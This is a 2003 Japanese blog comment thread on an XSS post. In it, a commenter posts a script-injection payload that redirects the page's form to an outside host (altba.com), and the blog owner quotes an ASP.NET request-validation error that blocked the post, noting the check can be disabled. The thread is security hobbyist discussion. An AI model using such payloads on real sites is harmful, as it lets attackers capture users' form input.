「DOM万歳(XSS大王つづき)」へのコメント
「水無月ばけらのえび日記 : DOM万歳(XSS大王つづき)」について、8件のコメントが書かれています。
[135] Re: えび日記 : 「DOM万歳(XSS大王つづき)」
えむけい (2003年6月24日 23時12分)
なんかタグを含む投稿で? エラーになります。再挑戦
"><script>document.forms[0].action="http://altba.com";document.forms[0].method="get"</script><span
[136] Re: えび日記 : 「DOM万歳(XSS大王つづき)」
えむけい (2003年6月24日 23時15分)
なぜかここに投稿しようとするとエラーになるのでよりaccesibleな【謎】exploitはとりあえずポータル墓場に投稿しておきます。
http://white.sakura.ne.jp/~rryu/hakaba/bbs.cgi?mode=mes&id=1351
[137] Re: えび日記 : 「DOM万歳(XSS大王つづき)」
ばけら (2003年6月25日 11時52分)
>なぜかここに投稿しようとするとエラーになるので
どんなエラーが出ていましたか?
実は ASP.NET 自体にヤバ目な POST を弾く機能があったりするので、そのせいかもしれません。
[138] Re: えび日記 : 「DOM万歳(XSS大王つづき)」
ばけら (2003年6月25日 11時56分)
>>なぜかここに投稿しようとするとエラーになるので
調査しましたが、やはり ASP.NET 自身がこういうエラーを出してますね。
================
危険な可能性のある Request.Form 値がクライアントから検出されました。
説明 : 要求の検証により、危険性のあるクライアント入力値が検出されました。要求の処理は中止されました。この値は、クロス サイト スクリプト攻撃などのアプリケーションのセキュリティ問題を引き起こす可能性があります。ページ ディレクティブか、 構成セクションの validateRequest=false を設定することによって要求の検証を無効にできます。しかしこの場合、アプリケーションですべての入力を明示的に確認することをお勧めします。
例外の詳細: System.Web.HttpRequestValidationException: 危険な可能性のある Request.Form 値がクライアントから検出されました。
================
この機能はオフにできるはずなので、ちょっと調べてみます。
[3769] 未承認メッセージ (投稿元:220.80.30.43)
reogkzt lyrqnhj (2006年7月25日 17時21分)
(この記事は承認されていないため、管理者が許可するまで公開されません。)
[3797] 未承認メッセージ (投稿元:58.233.138.152)
ncwevljtm vkhc (2006年8月17日 7時50分)
(この記事は承認されていないため、管理者が許可するまで公開されません。)
「水無月ばけらのえび日記 : DOM万歳(XSS大王つづき)」についてコメントを書く場合は、以下のフォームに記入してください。
